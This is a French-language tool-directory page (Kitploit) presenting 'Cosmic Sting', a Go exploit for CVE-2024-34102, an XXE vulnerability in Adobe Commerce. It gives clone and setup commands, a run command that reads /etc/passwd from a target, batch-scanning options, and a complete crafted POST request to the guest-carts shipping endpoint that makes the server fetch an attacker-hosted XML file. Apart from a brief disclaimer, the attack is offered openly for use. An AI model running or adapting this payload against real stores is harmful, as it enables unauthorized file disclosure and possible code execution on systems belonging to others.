Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-34102 — Exploit basé sur Go pour CVE-2024-34102, une vulnérabilité XXE dans Adobe Commerce permettant une exécution de code à distance. Prend en charge l'analyse d'URL en mode unique et par lots avec lecture de fichiers via SSRF. | Kitploit
Outils/GitHubGitHub/kento-sec/cve-2024-34102
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubkento-sec/cve-2024-34102

CVE-2024-34102

Exploit basé sur Go pour CVE-2024-34102, une vulnérabilité XXE dans Adobe Commerce permettant une exécution de code à distance. Prend en charge l'analyse d'URL en mode unique et par lots avec lecture de fichiers via SSRF.

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Cosmic Sting : Exploiteur CVE-2024-34102

Cosmic Sting est un outil basé sur Go conçu pour exploiter CVE-2024-34102, une vulnérabilité d'exécution de code à distance.

Détail de CVE-2024-34102

Les versions d'Adobe Commerce 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 et antérieures sont affectées par une vulnérabilité de restriction incorrecte des références d'entités externes XML (« XXE ») qui pourrait entraîner l'exécution de code arbitraire. Un attaquant pourrait exploiter cette vulnérabilité en envoyant un document XML conçu qui référence des entités externes. L'exploitation de ce problème ne nécessite pas d'interaction de l'utilisateur.

Prérequis

  • Go (1.16 ou plus)

Installation

  1. Clonez le dépôt :

    root@kitploit:~
    git clone https://github.com/bughuntar/CVE-2024-34102.git &&
    cd CVE-2024-34102
    
  2. Installez les dépendances (le cas échéant) :

    root@kitploit:~
    go version &&
    go mod init cosmic_sting &&
    go get github.com/fatih/color &&
    go get github.com/google/uuid &&
    go get github.com/urfave/cli/v2
    

URL unique

Pour exécuter l'outil avec une seule URL :

root@kitploit:~
go run cosmic_sting.go -u "http://example.com" -f "/etc/passwd"

Options

  • -u, --url : URL unique à exploiter.
  • -f, --file : Fichier à lire via SSRF.
  • -l, --list : Fichier contenant une liste d'URL à exploiter.

Requête POST avec un fichier DTD XML conçu :

root@kitploit:~
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
Host: {{hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
Content-Type: application/json
Content-Length: 187

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"https://{{hostedXMLfile.com}}/xxe.xml","dataIsURL":true,"options":1234}}}}}}

Licence

Ce projet n'est pas sous licence, il a été créé uniquement pour un projet personnel.

Contribution

Les contributions sont les bienvenues ! Veuillez ouvrir une issue ou soumettre une pull request pour toute modification.

Avertissement

Cet outil est destiné uniquement à des fins éducatives. Utilisez-le de manière responsable et uniquement sur des systèmes que vous avez la permission de tester.

Auteur

Professor the Hunter --> Suivez-moi sur Twitter

CVE-2024-34102

Télécharger l’outil